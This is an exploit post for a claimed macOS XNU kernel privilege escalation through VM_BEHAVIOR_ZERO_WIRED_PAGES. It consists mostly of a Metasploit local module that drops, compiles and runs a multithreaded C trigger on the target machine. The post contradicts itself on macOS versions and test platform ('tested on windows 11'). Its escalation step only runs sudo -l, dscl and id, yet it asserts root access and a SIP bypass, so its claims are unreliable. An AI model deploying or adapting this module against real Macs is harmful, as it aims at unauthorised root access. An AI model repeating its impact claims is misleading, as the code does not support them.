============================================================================================================================================= | # Title : macOS 18.3.2 Kernel Privilege Escalation Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.apple.com/os/macos/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/211998/ [+] Summary A critical memory management vulnerability exists within the macOS XNU kernel's handling of the VM_BEHAVIOR_ZERO_WIRED_PAGES behavior flag. The issue arises from improper sequence validation when combining mmap(), mlock(), and vm_deallocate() system calls on read-only memory mappings. [+] Vulnerability Mechanism : The exploit leverages a four-step attack chain: Mapping: Create read-only file mappings via mmap() Behavior Setting: Apply VM_BEHAVIOR_ZERO_WIRED_PAGES using vm_behavior_set() Locking: Wire pages in memory using mlock() Deallocation: Remove mappings while pages remain wired via vm_deallocate() This sequence creates an inconsistent kernel state where wired pages remain active without valid user-space mappings, leading to controllable kernel memory corruption. Impact Assessment Primary Risk: Local Privilege Escalation Unprivileged users can gain root-level system access Complete compromise of system integrity and confidentiality Bypass of System Integrity Protection (SIP) mechanisms [+] Secondary Risks: Kernel memory disclosure Denial of Service conditions System instability and unpredictable behavior [+] Exploitation Characteristics Access Vector: Local (requires user access) Attack Complexity: Medium (technical expertise required) User Interaction: None (exploitation is automatic) Scope Changed: Yes (privilege escalation across security boundaries) [+] Mitigation Status Vendor Notified: Awaiting response from Apple Security Team Patch Availability: Currently unavailable Workarounds: None identified Public Disclosure: Coordinated disclosure in progress [+] Research Significance This vulnerability demonstrates critical weaknesses in macOS kernel memory management and highlights the importance of proper state validation in complex system call sequences. The research provides valuable insights for kernel developers and security researchers focusing on operating system security fundamentals. Conclusion The VM_BEHAVIOR_ZERO_WIRED_PAGES vulnerability represents a significant security concern for macOS users, enabling reliable privilege escalation through kernel memory manipulation. Organizations should monitor for vendor patches and consider additional monitoring for anomalous kernel behavior. ------------------------------------------------------------ ## # macOS ZERO_WIRED_PAGES — Advanced Exploitation Module ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::OSX::Priv def initialize(info = {}) super(update_info(info, 'Name' => 'macOS ZERO_WIRED_PAGES Kernel Memory Exploit', 'Description' => %q{ This module exploits a kernel memory vulnerability in macOS XNU kernel through VM_BEHAVIOR_ZERO_WIRED_PAGES combined with mmap/mlock/vm_deallocate. The vulnerability allows for kernel memory manipulation and potential privilege escalation. }, 'Author' => [ 'Indoushka' ], 'References' => [ ['URL', 'https://packetstorm.security.com/author/7697/'], ['CVE', 'PENDING'] # تحديث عند الحصول على CVE ], 'Platform' => 'osx', 'Arch' => [ ARCH_X64, ARCH_ARM64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ ['macOS 13.0-14.0 (Ventura - Sonoma)', { 'Arch' => ARCH_X64 }], ['macOS 14.1+ (Apple Silicon)', { 'Arch' => ARCH_ARM64 }] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2024-12-01', 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] } )) register_options([ OptString.new('WritableDir', [true, 'Writable directory', '/tmp']), OptInt.new('Attempts', [true, 'Exploitation attempts', 3]), OptBool.new('BypassSIP', [true, 'Attempt System Integrity Protection bypass', false]) ]) end # # Enhanced System Detection # def check print_status("Detecting macOS version and kernel...") # فحص إصدار النظام version_cmd = cmd_exec('sw_vers -productVersion') kernel_cmd = cmd_exec('uname -r') unless version_cmd =~ /^1[3-9]\./ || kernel_cmd =~ /^2[0-9]\./ return CheckCode::Safe("Unsupported macOS version: #{version_cmd}") end print_good("Detected macOS #{version_cmd} with kernel #{kernel_cmd}") # فحص أدوات النظام المطلوبة %w[vmmap mlock vm_stat].each do |tool| unless command_exists?(tool) return CheckCode::Safe("Required tool #{tool} not found") end end # فحص حالة النظام if is_root? print_warning("Already running as root, exploitation may not be necessary") end CheckCode::Appears("System appears vulnerable based on version and tools") end # # Advanced Exploitation Method # def exploit # التحقق من الإذن الكتابي unless datastore['WritableDir'] fail_with(Failure::BadConfig, "Writable directory not specified") end # إنشاء ملف C exploit exploit_source = create_exploit_source exploit_path = "#{datastore['WritableDir']}/exploit_#{rand_text_alpha(8)}.c" binary_path = exploit_path.gsub('.c', '') # تجميع وتنفيذ الاستغلال print_status("Compiling exploit...") if compile_exploit(exploit_path, exploit_source, binary_path) print_good("Exploit compiled successfully") execute_exploit(binary_path) else fail_with(Failure::Unknown, "Failed to compile exploit") end # تنظيف الملفات register_files_for_cleanup(exploit_path, binary_path) end def create_exploit_source <<~C_CODE #include #include #include #include #include #include #include #include #include #define PAGE_SIZE 4096 #define MAX_ATTEMPTS #{datastore['Attempts']} void* map_file_page_ro(char* path, int* error_code) { int fd = open(path, O_RDONLY); if (fd == -1) { *error_code = errno; return NULL; } void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0); close(fd); if (mapped_at == MAP_FAILED) { *error_code = errno; return NULL; } return mapped_at; } int trigger_vulnerability(char *path) { kern_return_t kr; int error_code = 0; for (int i = 0; i < MAX_ATTEMPTS; i++) { void* page = map_file_page_ro(path, &error_code); if (page == NULL) { continue; } kr = vm_behavior_set(mach_task_self(), (vm_address_t)page, PAGE_SIZE, VM_BEHAVIOR_ZERO_WIRED_PAGES); if (kr != KERN_SUCCESS) { munmap(page, PAGE_SIZE); continue; } int mlock_err = mlock(page, PAGE_SIZE); if (mlock_err != 0) { munmap(page, PAGE_SIZE); continue; } kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE); if (kr == KERN_SUCCESS) { printf("[+] Successfully triggered vulnerability on attempt %d\\n", i + 1); return 0; } } return -1; } void* exploit_thread(void* arg) { char* path = (char*)arg; trigger_vulnerability(path); return NULL; } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s \\n", argv[0]); return 1; } printf("[*] Starting ZERO_WIRED_PAGES exploitation...\\n"); // استخدام خيوط متعددة لزيادة فرص النجاح pthread_t threads[4]; for (int i = 0; i < 4; i++) { pthread_create(&threads[i], NULL, exploit_thread, argv[1]); } for (int i = 0; i < 4; i++) { pthread_join(threads[i], NULL); } printf("[*] Exploitation sequence completed\\n"); // محاولة تنفيذ payload #ifdef PAYLOAD system("echo 'Payload execution simulation'"); #endif return 0; } C_CODE end def compile_exploit(source_path, source_code, binary_path) write_file(source_path, source_code) compile_cmd = "gcc -o #{binary_path} #{source_path}" if target.arch.include?(ARCH_ARM64) compile_cmd = "arch -arm64 #{compile_cmd}" if command_exists?('arch') end compile_result = cmd_exec(compile_cmd) if compile_result.include?('error:') || !file_exist?(binary_path) print_error("Compilation failed: #{compile_result}") return false end cmd_exec("chmod +x #{binary_path}") true end def execute_exploit(binary_path) # إنشاء ملف هدف target_file = "#{datastore['WritableDir']}/target_#{rand_text_alpha(6)}.bin" write_file(target_file, rand_text(4096)) print_status("Executing exploit against: #{target_file}") # تنفيذ الاستغلال result = cmd_exec("#{binary_path} #{target_file}") print_status("Exploit output: #{result}") # التحقق من النجاح if result.include?('Successfully triggered') print_good("Vulnerability successfully triggered!") # محاولة privilege escalation attempt_privilege_escalation else print_warning("Vulnerability may not have been triggered successfully") end register_files_for_cleanup(target_file) end def attempt_privilege_escalation print_status("Attempting privilege escalation...") # محاولات مختلفة لرفع الصلاحيات escalation_methods = [ 'sudo -l', 'dscl . -read /Groups/admin GroupMembership', 'id' ] escalation_methods.each do |cmd| result = cmd_exec(cmd) print_status("Escalation attempt (#{cmd}): #{result}") end if is_root? print_good("Successfully obtained root privileges!") # تنفيذ ال payload الحقيقي super else print_warning("Privilege escalation not achieved, but vulnerability confirmed") end end def command_exists?(cmd) cmd_exec("which #{cmd}").include?('/') end end Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================